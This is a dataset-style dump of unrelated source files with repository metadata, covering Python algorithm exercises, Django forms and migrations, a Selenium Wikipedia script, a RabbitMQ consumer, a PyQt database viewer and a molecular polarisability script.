node = queue.pop(0)
if node.left is not None:
queue.append(node.left)
paths.append(node.left.val)
else:
paths.append(-1)
if node.right is not None:
queue.append(node.right)
paths.append(node.right.val)
else:
paths.append(-1)
if node == last:
if symmetric(paths):
paths = list()
else:
res = False
break
last = queue[-1] if len(queue) > 0 else None
return res
| [
"zhongyongbin@foxmail.com"
] | zhongyongbin@foxmail.com |
846156dea3633908b6dc661e9d7f8eecb044c23b | 4be944cfcd6a9fd45c727e063765d59c77079877 | /Anaklit.py | 3a87ae792b14bff93447e29150343826ed94bcb0 | [] | no_license | Igor-Zhuk/Lessons-IZ- | f1b67c94de85c8f3796c37a30f33e49f2bbb62ce | 120b94cc115395632dd872b7ef62cac86aa65d15 | refs/heads/master | 2021-01-11T20:37:44.636402 | 2017-01-27T17:33:08 | 2017-01-27T17:33:08 | 79,156,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | from selenium import webdriver
driver = webdriver.Chrome()
driver.get('http://uk.wikipedia.org')
seach_form = driver.find_element_by_css_selector('#searchInput')
seach_form.send_keys('список римських пап')
seach_button = driver.find_element_by_css_selector('#searchButton')
seach_button.click()
pope_cletus = driver.find_element_by_css_selector('div#mw-content-text table:nth-child(9) > tbody > tr:nth-child(5) > td:nth-child(3) > a > img')
pope_cletus.click()
| [
"test@test.com"
] | test@test.com |
621dc95e864026fe0243c7a2462182de011d8f60 | 299fe2ca879e509798e95c00b7ba33914031f4a7 | /eruditio/shared_apps/django_metatagging/forms.py | ed4aeffd7ebd07107be6b4732d04b510f4c4f84f | [
"MIT"
] | permissive | genghisu/eruditio | dcf2390c98d5d1a7c1044a9221bf319cb7d1f0f6 | 5f8f3b682ac28fd3f464e7a993c3988c1a49eb02 | refs/heads/master | 2021-01-10T11:15:28.230527 | 2010-04-23T21:13:01 | 2010-04-23T21:13:01 | 50,865,100 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 894 | py | import django.forms as forms
import django_utils.form_widgets as form_widgets
import django_utils.html_helpers as html_helpers
import django_utils.form_helpers as form_helpers
from tagging.models import Tag
def build_retag_form(object):
initial_tags = [tag.name for tag in Tag.objects.get_for_object(object)]
tags_as_string = ",".join(initial_tags)
base_fields = {'tags' : forms.CharField(max_length = 200,
required = True,
initial = tags_as_string,
widget = form_widgets.StandardCharfield(attrs={'class':'required question_form'}),
help_text = 'Combine multiple words into single-words. Seperate tags using commas. Maximum five tags. At least one tag required.')}
RetagForm = type('RetagForm', (form_helpers.DivForm, ), base_fields)
return RetagForm | [
"genghisu@6a795458-236b-11df-a5e4-cb4ff25536bb"
] | genghisu@6a795458-236b-11df-a5e4-cb4ff25536bb |
d15218fea4676e1d776105758f2846a22272c89d | 7d8c7866b15a90f732d46bbbea686f96f104c77a | /lidar/protox2d_consume.py~ | 3fc2755d66902b09750f3dafd59ba447594c8713 | [] | no_license | lforet/astroid | 285cf1d7c6d081095292fea11913a86286d762a6 | 245ffda31d4f11039e8798faf6ca959ed087ac65 | refs/heads/master | 2020-12-24T15:58:24.335543 | 2015-05-15T12:37:13 | 2015-05-15T12:37:13 | 13,452,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,775 | #!/usr/bin/python
import pika
import thread, time, sys, traceback
''' USAGE:
lidar = consume_lidar(channel_name.#, ip_of_publisher)
EXAMPLE:
lidar = consume_lidar('lidar.1', 'localhost')
'''
class consume_lidar():
def __init__(self, channel_name, host_ip):
self.id = None
self.rpm = None
self.data = None
#-------------connection variables
self.channel_name = channel_name
self.host_ip = host_ip
self.queue_name = None
self.connection = None
self.channel = None
#----------------------RUN
self.run()
def connect(self):
self.connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.host_ip))
self.channel = self.connection.channel()
self.channel.exchange_declare(exchange='astroid_data_feed',type='topic')
result = self.channel.queue_declare(exclusive=True, auto_delete=True, arguments={'x-message-ttl':1000})
self.queue_name = result.method.queue
binding_keys = self.channel_name
self.channel.queue_bind(exchange='astroid_data_feed', queue=self.queue_name, routing_key=binding_keys)
def read_lidar(self):
#method_frame = None
while True:
if self.connection == None or self.connection.is_open == False:
self.connect()
#time.sleep(0.01) # do not hog the processor power
#print "-" * 50
method_frame, properties, body = self.channel.basic_get(queue=self.queue_name)
if method_frame:
# Display the message parts
print body
self.channel.basic_ack(method_frame.delivery_tag)
#else:
# print "no msgs read"
# time.sleep(.25)
def run(self):
self.th = thread.start_new_thread(self.read_lidar, ())
if __name__== "__main__":
lidar = consume_lidar('protox2d.1', 'localhost')
while True:
time.sleep(1)
#print 'signal strength:', wifi.signal_strength
| [
"laird@isotope11.com"
] | laird@isotope11.com | |
3a75dd6f6af19d4710fd04b52d23f4908db05a5e | 9a4de72aab094c87cfee62380e7f2613545eecfb | /deploy/utils/HedwigRegistration.py | d21b9e6c5889a69dfc70076ee782c9dc0df3e2ca | [] | no_license | jamesduan/asset | ed75765c30a5288aaf4f6c56bbf2c9a059105f29 | f71cb623b5ba376309cb728ad5c291ced2ee8bfc | refs/heads/master | 2021-01-10T00:06:41.120678 | 2017-05-27T11:40:48 | 2017-05-27T11:40:48 | 92,730,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,787 | py | # -*- coding: utf-8 -*-
from server.models import ServerStandard
from util.httplib import httpcall2
from django.conf import settings
from django.core.cache import get_cache
from deploy.utils.DeployError import DeployError
from deploy.utils.DeployCommon import i2
import json
class HedwigRegistration:
def __init__(self, ip, task_id):
self.ip = ip
self.server_obj = ServerStandard.objects.exclude(server_status_id=400).get(ip=ip)
self.app_obj = self.server_obj.app
self.task_id = task_id
self.cache = get_cache('deploy', **{'LOCATION': settings.CACHES['deploy']['LOCATION'] + '2'})
def unregister(self):
self.hedwig('disabled', '下架')
def hedwig(self, method, action):
code, response = httpcall2(settings.DETECTOR['PREFIX'] + settings.DETECTOR['METHOD_API'] % (
settings.CMDB_DETECTOR_IDC_MAPPING.get(self.server_obj.rack.room_id),
settings.DETECTOR['SECRET'],
settings.DETECTOR['SECRET'], self.ip, method))
if code == 200:
print code, response
response = json.loads(response)
if response.get('result') == '0':
msg = 'hedwig%s成功' % action
else:
msg = 'hedwig%s失败,原因为%s' % (action, response.get('warn'))
self.i(msg)
return msg
else:
msg = 'hedwig%s失败,原因%s|%s' % (action, code, response)
self.ie(msg)
def ie(self, log):
self.i('修改服务器状态为预上线失败')
self.server_obj.server_status_id = 230
self.server_obj.save()
self.i(log, error=True)
raise DeployError(log)
def i(self, log, error=False):
i2(self.cache, self.task_id, log, error)
| [
"duanlingxiao@yhd.com"
] | duanlingxiao@yhd.com |
f9ab1c3c7ef0193482098d941e3cd7ed5f28368a | c62bd77742f921b8f50b886db7488ce03725f5ab | /aether/gallery/signals.py | 863e74fd222dbcc9ae022b59073f50e8e9ecde03 | [
"MIT"
] | permissive | katajakasa/aetherguild4 | a361688a87d86ae2284a4c07aa9fe9d6b91d2fbb | 2d51f73fad15bfa9a0da052f2509b308d566fafa | refs/heads/master | 2023-08-03T19:51:43.808931 | 2023-07-28T17:35:01 | 2023-07-28T17:35:01 | 143,641,102 | 0 | 0 | MIT | 2023-05-09T22:42:13 | 2018-08-05T19:17:15 | Python | UTF-8 | Python | false | false | 179 | py | from django.urls import reverse
from aether.utils.cache import expire_page
def invalidate_cache(sender, instance, created, **kwargs):
expire_page(reverse("gallery:index"))
| [
"katajakasa@gmail.com"
] | katajakasa@gmail.com |
4b42af7817fa95de8c35a0ffcd2982a8252f6986 | bf5935cecf1b65461b1de9a67a013f0b03c3d1d0 | /boutique/migrations/0022_reactions.py | 647ad1fa7974382b266bcb9546bb40c4a3275ab3 | [] | no_license | meriemay/Shop | 53287aab6382163e6069130c8e5304ed7ffd0e3b | f5d44193e030c4ef9b5cf27896754767beaee3ef | refs/heads/master | 2021-01-18T17:50:49.688779 | 2017-08-29T14:34:34 | 2017-08-29T14:34:34 | 100,497,878 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-03 11:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('boutique', '0021_auto_20170801_0931'),
]
operations = [
migrations.CreateModel(
name='Reactions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=200, unique=True)),
],
),
]
| [
"you@example.com"
] | you@example.com |
240e7802a9c640da7dacbe2731ba8831291f84e7 | 59153ef9b6947c5400c4a3cdf208c320e850a1bb | /functions_modules/random/random_learn.py | c737c03046faa3246b53be4f269c063d089ef675 | [] | no_license | QAMilestoneAcademy/PythonForBeginners | fd0089eee1c719853c359c57c310f41a6898ee55 | bf6eac132eee1ffd5fe356497457f9cc12ff5b00 | refs/heads/master | 2022-12-12T10:08:19.919708 | 2020-09-08T05:56:28 | 2020-09-08T05:56:28 | 283,969,801 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | import random
print("random float:",random.random())
print("random int:",random.randint(1,10))
print("random from range with step:",random.randrange(1,10,2))
print("random element from a sequence:",random.choice(['computer','telephone','tv','nintendo']))
| [
"48306511+QAMilestoneAcademy@users.noreply.github.com"
] | 48306511+QAMilestoneAcademy@users.noreply.github.com |
708ab8176b24a3a3194b4dbd961757684d5752bf | 7bff109bf258f053644b5bd4ceb26f6193eec1f4 | /objfromconfig/objfromconfig.py | ea762f84008dd4c5e7423019ad393983538feca9 | [
"Apache-2.0"
] | permissive | johann-petrak/python-objfromconfig | 3f6529cbf95c07acfe3c1a3da2019f68500712c0 | fc0f11839cfc0da1bd9b8381538fa5a080e575c6 | refs/heads/main | 2023-04-30T00:20:19.813933 | 2021-05-14T18:42:48 | 2021-05-14T18:42:48 | 367,435,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,153 | py | """
Module for creating objects from configuration dicts and retrieve the configuration dicts from objects.
"""
from inspect import signature
from inspect import Parameter
import importlib
def build_args(func, cfg):
"""
Matches a configuration dictionary against the function parameters.
"""
sig = signature(func)
args = []
kwargs = {}
for cn in cfg.keys():
if not cn.startswith("$") and cn not in sig.parameters:
raise Exception(f"Function {func} does not have a parameter: {cn}")
for n, p in sig.parameters.items():
if n in cfg:
val = cfg[n]
else:
# check if we have a default value for the parameter
if p.default == Parameter.empty:
raise Exception("No default and no value specified for parameter", n)
else:
# val = p.default
continue
if p.kind == Parameter.POSITIONAL_ONLY:
args.append(val)
elif p.kind == Parameter.POSITIONAL_OR_KEYWORD:
args.append(val)
elif p.kind == Parameter.VAR_POSITIONAL:
# chekc if val is iterable?
args.extend(val)
elif p.kind == Parameter.KEYWORD_ONLY:
kwargs[n] = val
elif p.kind == Parameter.VAR_KEYWORD:
# check if val is dict?
kwargs.update(val)
return args, kwargs
def class_from_dict(thedict):
cpath = thedict["$class"]
# cpath must be of the form [a.b.c.]ClassName
# so we split on the last dot, if any
pack, _, clname = cpath.rpartition(".")
modul = importlib.import_module(pack)
clazz = getattr(modul, clname)
inst = clazz.__new__(clazz)
tmpargs, tmpkwargs = build_args(inst.__init__, thedict)
# recursively construct any nested objects, if necessary
def replace_by_obj(val):
if isinstance(val, dict) and "$class" in val:
return class_from_dict(val)
return val
tmpargs = [replace_by_obj(arg) for arg in tmpargs]
tmpkwargs = {n: replace_by_obj(arg) for n, arg in tmpkwargs.items()}
inst.__init__(*tmpargs, **tmpkwargs)
return inst
class ObjFromConfig:
def __init__(self):
self._objfromconfig_cfg = {}
@classmethod
def from_config(cls, config):
return class_from_dict(config)
def store_config(self, ldict):
initfunc = self.__init__
parms = list(signature(initfunc).parameters.items())
cfg = {}
for n, p in parms:
# check if parm has a default value
# if yes, check if that value is identical to the ldict value, if yes, do not store in config
if p.default is not None and p.default == ldict[n]:
continue
# if an object has been created by a config, store the config instead of the object
val = ldict[n]
if isinstance(val, ObjFromConfig):
val = val.get_config()
cfg[n] = val
cfg["$class"] = f"{self.__module__}.{type(self).__name__}"
self._objfromconfig_cfg = cfg
def get_config(self):
return self._objfromconfig_cfg
| [
"johann.petrak@gmail.com"
] | johann.petrak@gmail.com |
5978c5ee6ec473a050a68ff64a46ead480340d4d | d7e160a2512b9d70b18adbffde4c6d9a61521a12 | /구현/04LockAndKey.py | 66f8d4f12679f5491dde093d3b6d761abe9b1f66 | [] | no_license | EoJin-Kim/CodingTest | 14b6cf7a3bb45954c065efdf9d1e05143cb321a3 | 975c753ee572f605f4d9a12a3dc54ab0d437dade | refs/heads/master | 2023-06-19T16:06:50.625143 | 2021-07-14T13:10:17 | 2021-07-14T13:10:17 | 356,877,598 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,568 | py | import copy
def solution(key, lock):
keyLen=len(key)
lockLen = len(lock)
plane = [ [0] * (2*keyLen + lockLen) for _ in range(2*keyLen + lockLen)]
for i in range(len(lock)):
for j in range(len(lock[0])):
plane[keyLen+i][keyLen+j] = lock[i][j]
# 바닥 확인
#for i in plane:
# print(i)
check=False
planeLen = len(plane)
#회전 4번 주기
for _ in range(4):
for i in range(planeLen-keyLen+1):
for j in range(planeLen-keyLen+1):
planeDup = copy.deepcopy(plane)
for z in range(keyLen):
for x in range(keyLen):
print(i,j,z,x)
planeDup[i+z][j+x] +=key[z][x]
for low in planeDup:
print(low)
print("------------------------")
result = CheckKey(keyLen,lockLen,planeDup)
if result:
return result
key=Rotate90(key)
return result
def Rotate90(a):
n=len(a)
m=len(a[0])
result = [[0]*n for _ in range(m)]
for i in range(n):
for j in range(m):
result[j][n-i-1] = a[i][j]
return result
def CheckKey(keyLen,lockLen,planeDup):
for i in range(keyLen, keyLen + lockLen):
for j in range(keyLen, keyLen + lockLen):
if planeDup[i][j] != 1:
return False
return True
if solution([[0, 0, 0], [1, 0, 0], [0, 1, 1]],[[1, 1, 1], [1, 1, 0], [1, 0, 1]]):
print("true")
else:
print("false") | [
"62640679+EoJin-Kim@users.noreply.github.com"
] | 62640679+EoJin-Kim@users.noreply.github.com |
16197d78cfaf44c38142ce9123d79719a4b50199 | ab519d86d6b336286064450cac7527d798f17880 | /Python/Collections/collections-namedtuple.py | 34220c5cf66721d2312dd6c7ff4363dd4f69418e | [] | no_license | dennisnderitu254/HackerRank-3 | a084f1b1ec72186b6421541d48e74dd75846ce83 | ed6e1eb3ac78bac1063db5b7cadec3f7f5a199f9 | refs/heads/master | 2020-03-11T08:25:20.797174 | 2017-08-03T17:53:52 | 2017-08-03T17:53:52 | 129,883,607 | 1 | 0 | null | 2018-04-17T09:55:02 | 2018-04-17T09:55:01 | null | UTF-8 | Python | false | false | 213 | py | #!/bin/usr/python3
from collections import namedtuple
n = int(input())
x = namedtuple("Student", input().strip().split())
avg = 0
for i in range(n): avg += float(x(*input().strip().split()).MARKS)
print (avg / n)
| [
"groove679@gmail.com"
] | groove679@gmail.com |
7ab6e8c266f0105d0e490fb7472865ee98ffd55a | 7f86f46f5048fad45cfdebe43b56dfe179688856 | /mmgpy/metamodel/rfr.py | ce46bb761ff9acec123d266f6831102326a192ab | [] | no_license | geoffreygarrett/metamodel-guidance-with-python | 502cc2055427c34d45b55129e290f31ec31d385a | d048a420c69e2fc019478784fcd04be3ae1d72b7 | refs/heads/master | 2022-03-30T09:00:11.520493 | 2020-01-16T13:30:36 | 2020-01-16T13:30:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,612 | py | from ._base import SurrogateModelBaseRegression
from sklearn.ensemble.forest import RandomForestRegressor as sklearnRFR
DEFAULT_RFR_PARAMS = {
"n_estimators": 'warn',
"criterion": "mse",
"max_depth": None,
"min_samples_split": 2,
"min_samples_leaf": 1,
"min_weight_fraction_leaf": 0.,
"max_features": "auto",
"max_leaf_nodes": None,
"min_impurity_decrease": 0.,
"min_impurity_split": None,
"bootstrap": True,
"oob_score": False,
"n_jobs": None,
"random_state": None,
"warm_start": False}
DEFAULT_RFR_ROUTINES = dict(
intermediate=[
{"integer__n_estimators": (200, 2000),
"integer__max_depth": (10, 100),
"integer__min_samples_leaf": (1, 4),
"_optimiser__name": "gp_minimize",
"_optimiser__kwargs": {"n_calls": 12, "n_random_starts": 4}
}
]
)
def _model_cls_(all_params):
return sklearnRFR(n_estimators=all_params["n_estimators"],
criterion=all_params["criterion"],
max_depth=all_params["max_depth"],
min_samples_split=all_params["min_samples_split"],
min_samples_leaf=all_params["min_samples_leaf"],
min_weight_fraction_leaf=all_params[
"min_weight_fraction_leaf"],
max_features=all_params["max_features"],
max_leaf_nodes=all_params["max_leaf_nodes"],
min_impurity_decrease=all_params[
"min_impurity_decrease"],
min_impurity_split=all_params["min_impurity_split"],
bootstrap=all_params["bootstrap"],
oob_score=all_params["oob_score"],
n_jobs=all_params["n_jobs"],
random_state=all_params["random_state"],
verbose=all_params["verbose"],
warm_start=all_params["warm_start"])
class RandomForestRegression(SurrogateModelBaseRegression):
def __init__(self, static_params=None):
super().__init__(routines=DEFAULT_RFR_ROUTINES,
hyperparams_default=DEFAULT_RFR_PARAMS,
hyperparams_static=static_params)
self._model_cls = sklearnRFR
def __str__(self):
return "Random Forest Regression (sklearn.ensemble." \
"RandomForestRegression)"
def copy_model(self, model, **kwargs):
"""
Parameters
----------
model
Returns
-------
"""
return model
| [
"g.h.garrett13@gmail.com"
] | g.h.garrett13@gmail.com |
2e9a186467e3f17ea0677fcfe75b85d6b1ce018d | 885303f19848405485a210100ac26f6e776113bb | /chapter12/GUI/callDispProducts.pyw | 8c66307569b8c2de963548b9b5d11c1e1531146f | [] | no_license | Rabidza/INF2611 | cc2120d56c918da23ed4c5e01dc0a753e9fd1fd7 | 24e9b9c52ab831e6f30042ad2ef293b448d98dc6 | refs/heads/master | 2020-03-20T02:38:35.092322 | 2018-09-24T15:31:40 | 2018-09-24T15:31:40 | 137,118,288 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,339 | pyw | import sys
from DispProducts import *
from PyQt4 import QtSql, QtGui
from chapter12 import settings
def createConnection():
db = QtSql.QSqlDatabase.addDatabase("QMYSQL")
db.setHostName(settings.HOST)
db.setDatabaseName(settings.DATABASE)
db.setUserName(settings.USER)
db.setPassword(settings.PASSWORD)
db.open()
print(db.lastError().text())
return True
class MyForm(QtGui.QDialog):
recno = 0
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = Ui_Dialog()
self.ui.setupUi(self)
self.model = QtSql.QSqlQueryModel(self)
self.model.setQuery("SELECT * FROM products")
self.record = self.model.record(0)
self.ui.prodid.setText(str(self.record.value("prod_id")))
self.ui.prodname.setText(str(self.record.value("prod_name")))
self.ui.qty.setText(str(self.record.value("quantity")))
self.ui.price.setText(str(self.record.value("price")))
QtCore.QObject.connect(self.ui.FirstButton, QtCore.SIGNAL("clicked()"),
self.dispFirst)
QtCore.QObject.connect(self.ui.PreviousButton, QtCore.SIGNAL("clicked()"),
self.dispPrevious)
QtCore.QObject.connect(self.ui.LastButton, QtCore.SIGNAL("clicked()"),
self.dispLast)
QtCore.QObject.connect(self.ui.NextButton, QtCore.SIGNAL("clicked()"),
self.dispNext)
def dispFirst(self):
MyForm.recno = 0
self.record = self.model.record(MyForm.recno)
self.ui.prodid.setText(str(self.record.value("prod_id")))
self.ui.prodname.setText(str(self.record.value("prod_name")))
self.ui.qty.setText(str(self.record.value("quantity")))
self.ui.price.setText(str(self.record.value("price")))
def dispPrevious(self):
MyForm.recno -= 1
if MyForm.recno < 0:
MyForm.recno = self.model.rowCount() - 1
self.record = self.model.record(MyForm.recno)
self.ui.prodid.setText(str(self.record.value("prod_id")))
self.ui.prodname.setText(str(self.record.value("prod_name")))
self.ui.qty.setText(str(self.record.value("quantity")))
self.ui.price.setText(str(self.record.value("price")))
def dispLast(self):
MyForm.recno = self.model.rowCount() - 1
self.record = self.model.record(MyForm.recno)
self.ui.prodid.setText(str(self.record.value("prod_id")))
self.ui.prodname.setText(str(self.record.value("prod_name")))
self.ui.qty.setText(str(self.record.value("quantity")))
self.ui.price.setText(str(self.record.value("price")))
def dispNext(self):
MyForm.recno += 1
if MyForm.recno > self.model.rowCount() - 1:
MyForm.recno = 0
self.record = self.model.record(MyForm.recno)
self.ui.prodid.setText(str(self.record.value("prod_id")))
self.ui.prodname.setText(str(self.record.value("prod_name")))
self.ui.qty.setText(str(self.record.value("quantity")))
self.ui.price.setText(str(self.record.value("price")))
if __name__ == "__main__":
app = QtGui.QApplication(sys.argv)
if not createConnection():
sys.exit(1)
myapp = MyForm()
myapp.show()
sys.exit(app.exec_())
| [
"neillhenning@gmail.com"
] | neillhenning@gmail.com |
0d2ff7147b9af069b96b1cdd823195b2d2617120 | d820c8efb25c9adb77015650a0f7dc6f1e983bfe | /abc/abc114_c.py | 10c62426f6542d1d4ff29bb49808e1bfbea68b22 | [] | no_license | toshikish/atcoder | 73fdaa2310f23f846279f9f7466bdb969448371f | 33676630d6820dd92ccf0931425b8906b065bedd | refs/heads/master | 2022-05-16T20:00:52.665762 | 2022-04-02T11:55:44 | 2022-04-02T11:55:44 | 173,099,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | N = int(input())
def dfs(s):
if int(s) > N:
return 0
ans = 1 if all(s.count(c) > 0 for c in '753') else 0
for c in '753':
ans += dfs(s + c)
return ans
print(dfs('0'))
| [
"toshiki@nanshika.com"
] | toshiki@nanshika.com |
bbaaf7c75067a4c26aed3aed58d0409cdb84e268 | d2332604fc80b6d622a263b2af644425a7e703de | /top_interview_questions/math/6_divide_two_integers.py | 533e4903124f79edaa24c2c9ee56c21793dbf652 | [] | no_license | abhijitdey/coding-practice | b3b83a237c1930266768ce38500d6812fc31c529 | 6ae2a565042bf1d6633cd98ed774e4a77f492cc8 | refs/heads/main | 2023-08-14T23:31:06.090613 | 2021-10-18T21:35:56 | 2021-10-18T21:35:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,737 | py | def divide(self, dividend: int, divisor: int) -> int:
# Constants.
MAX_INT = 2147483647 # 2**31 - 1
MIN_INT = -2147483648 # -2**31
HALF_MIN_INT = -1073741824 # MIN_INT // 2
# Special case: overflow.
if dividend == MIN_INT and divisor == -1:
return MAX_INT
# We need to convert both numbers to negatives.
# Also, we count the number of negatives signs.
negatives = 2
if dividend > 0:
negatives -= 1
dividend = -dividend
if divisor > 0:
negatives -= 1
divisor = -divisor
doubles = []
powersOfTwo = []
# Nothing too exciting here, we're just making a list of doubles of 1 and
# the divisor. This is pretty much the same as Approach 2, except we're
# actually storing the values this time. */
powerOfTwo = 1
while divisor >= dividend:
doubles.append(divisor)
powersOfTwo.append(powerOfTwo)
# Prevent needless overflows from occurring...
if divisor < HALF_MIN_INT:
break
divisor += divisor # Double divisor
powerOfTwo += powerOfTwo
# Go from largest double to smallest, checking if the current double fits.
# into the remainder of the dividend.
quotient = 0
for i in reversed(range(len(doubles))):
if doubles[i] >= dividend:
# If it does fit, add the current powerOfTwo to the quotient.
quotient += powersOfTwo[i]
# Update dividend to take into account the bit we've now removed.
dividend -= doubles[i]
# If there was originally one negative sign, then
# the quotient remains negative. Otherwise, switch
# it to positive.
return quotient if negatives != 1 else -quotient
| [
"ashiz2013@gmail.com"
] | ashiz2013@gmail.com |
2868f60f8010ce7f44464f510a83a6dec6145354 | 578f4950b843c2b0a199d9dbcbb99c6148483b40 | /pytext/models/embeddings/contextual_token_embedding.py | 93be4ec0374dc6a5a9d24c1e5e480d14e7012510 | [
"BSD-3-Clause"
] | permissive | appatsekhar/pytext | 2a9725cb3eb8c3283587777873b241d9244c6b34 | f82830da00339392fd17c70572cf1920262d6d74 | refs/heads/master | 2020-08-06T11:20:21.065498 | 2019-10-04T22:35:46 | 2019-10-04T22:37:00 | 212,957,720 | 3 | 0 | NOASSERTION | 2019-10-05T06:56:14 | 2019-10-05T06:56:13 | null | UTF-8 | Python | false | false | 1,522 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import torch
from pytext.config.field_config import ContextualTokenEmbeddingConfig
from .embedding_base import EmbeddingBase
class ContextualTokenEmbedding(EmbeddingBase):
"""Module for providing token embeddings from a pretrained model."""
Config = ContextualTokenEmbeddingConfig
@classmethod
def from_config(cls, config: ContextualTokenEmbeddingConfig, *args, **kwargs):
return cls(config.embed_dim)
def forward(self, embedding: torch.Tensor) -> torch.Tensor:
embedding_shape = torch.onnx.operators.shape_as_tensor(embedding)
# Since embeddings vector is flattened, verify its shape correctness.
if embedding_shape[1].item() % self.embedding_dim != 0:
raise ValueError(
f"Input embedding_dim {embedding_shape[1]} is not a"
+ f" multiple of specified embedding_dim {self.embedding_dim}"
)
# Unflatten embedding Tensor from (batch_size, seq_len * embedding_size)
# to (batch_size, seq_len, embedding_size).
num_tokens = embedding_shape[1] // self.embedding_dim
new_embedding_shape = torch.cat(
(
torch.LongTensor([-1]),
num_tokens.view(1),
torch.LongTensor([self.embedding_dim]),
)
)
return torch.onnx.operators.reshape_from_tensor_shape(
embedding, new_embedding_shape
)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
eb353673048b1119249215a1b55d0f840e72568b | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_atomic.py | 35cc43462c3df24a4ec447fb1d31a5b6264c1ffa | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py |
#calss header
class _ATOMIC():
def __init__(self,):
self.name = "ATOMIC"
self.definitions = [u'relating to atoms: ', u'using the energy that is created when an atom is divided: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
f28483dc2e673080f7855f8385ce80201400739e | cbda89443b351bb2047180dad4e300c13dc3df7f | /CalcPol/nTs_multipars.py | ebfe87a269d2f475191ac7edc591eb6f08108575 | [] | no_license | sheridanfew/pythonpolarisation | 080f52979f98d26360a46412a10c8e3f51ee4549 | 178e2684e9a239a8e60af5f7b1eb414ac5f31e92 | refs/heads/master | 2021-07-10T01:07:40.978790 | 2021-03-11T16:56:37 | 2021-03-11T16:56:37 | 96,101,351 | 0 | 0 | null | 2017-07-03T13:37:06 | 2017-07-03T10:54:52 | null | UTF-8 | Python | false | false | 3,447 | py | import sys
sys.path.append('../')
from BasicElements import *
from BasicElements.Register import GetRegister
from BasicElements.MoleculeFactory import ReadMoleculeType
from BasicElements.MoleculeFactory import GetMolecule
from BasicElements.Crystal import *
from Polarizability.GetDipoles import get_dipoles,split_dipoles_onto_atoms
from Polarizability import *
from Polarizability.GetEnergyFromDips import *
from Polarizability.JMatrix import JMatrix
import numpy as np
from math import *
from time import gmtime, strftime
import os
print strftime("%a, %d %b %Y %X +0000", gmtime())
basename='nTs'
g = open('Polarisabilities_%s.csv' % basename, 'w')
g.write(basename)
g.write('\nLength\tMethod\tFit\tLong_calpol\tLong_pypol\tLong_ratio\tShort_calpol\tShort_pypol\tShort_ratio\tFace_calpol\tFace_pypol\tFace_ratio')
for method in ['Lin','Exp']:
for fit in ['components', 'mean', 'empirical']:
name=basename + '_' + method + '_' + fit
f = open('properies_%s.dat' % name, 'w')
f.write(name)
for n in range(1,9,1):
print 'N', n, ' Namefile: ', name
exec( "from Molecules.pol_thio_" + str(n) + "T_neut import pol")
calpol=pol
calpoldiag=list(np.diag(calpol))
calpol_max = max(calpoldiag)
calpol_max_index = calpoldiag.index(calpol_max)
calpol_min = min(calpoldiag)
calpol_min_index = calpoldiag.index(calpol_min)
calpol_thirdindex=[v for v in [0,1,2] if not ( v == calpol_max_index or v == calpol_min_index)][0]
namefile= str( 'thio_' + str(n) + 'T_neut_aniso_chelpg_thole_' + method + '_' + fit + '.xyz' )
ReadMoleculeType('../Molecules/' + namefile)
mol = GetMolecule('../Molecules/' + namefile)
jm=JMatrix(jmtype='Thole' + method + 'Iso')
pypol=np.matrix([[0.,0.,0.],[0.,0.,0.],[0.,0.,0.]])
etamat=np.matrix([[0.,0.,0.],[0.,0.,0.],[0.,0.,0.]])
for i in np.arange(0. ,2.1 ,1. ):
E0 = np.matrix([0.,0.,0.])
E0[0,i]=1.
d = get_dipoles(E0=E0,jm=jm._m)
split_d = split_dipoles_onto_atoms(d)
tot = np.matrix([0.,0.,0.])
for dd in split_d:
tot += dd
print 'tot'
print tot
pypol.T[i] = tot
pypoldiag=list(np.diag(pypol))
etamat=np.multiply((pypol-calpol),(pypol-calpol))/np.multiply(calpol,calpol)
ratios=np.divide(pypol,calpol)
ratiosdiag=list(np.diag(ratios))
g.write('\n' + str(n) + '\t' + method + '\t' + fit + '\t' + str(calpoldiag[calpol_max_index]) + '\t' + str(pypoldiag[calpol_max_index]) + '\t' + str(ratiosdiag[calpol_max_index]) + '\t' + str(calpoldiag[calpol_thirdindex]) + '\t' + str(pypoldiag[calpol_thirdindex]) + '\t' + str(ratiosdiag[calpol_thirdindex]) + '\t' + str(calpoldiag[calpol_min_index]) + '\t' + str(pypoldiag[calpol_min_index]) + '\t' + str(ratiosdiag[calpol_min_index]))
# If calibration polarisability is 0, eta not appropriate fit here (and previous funct will have made undefined), set value in etamat to 0
for i in np.arange(0,3,1):
for j in np.arange(0,3,1):
if calpol[i,j] == 0:
etamat[i,j] = '0'
eta=0
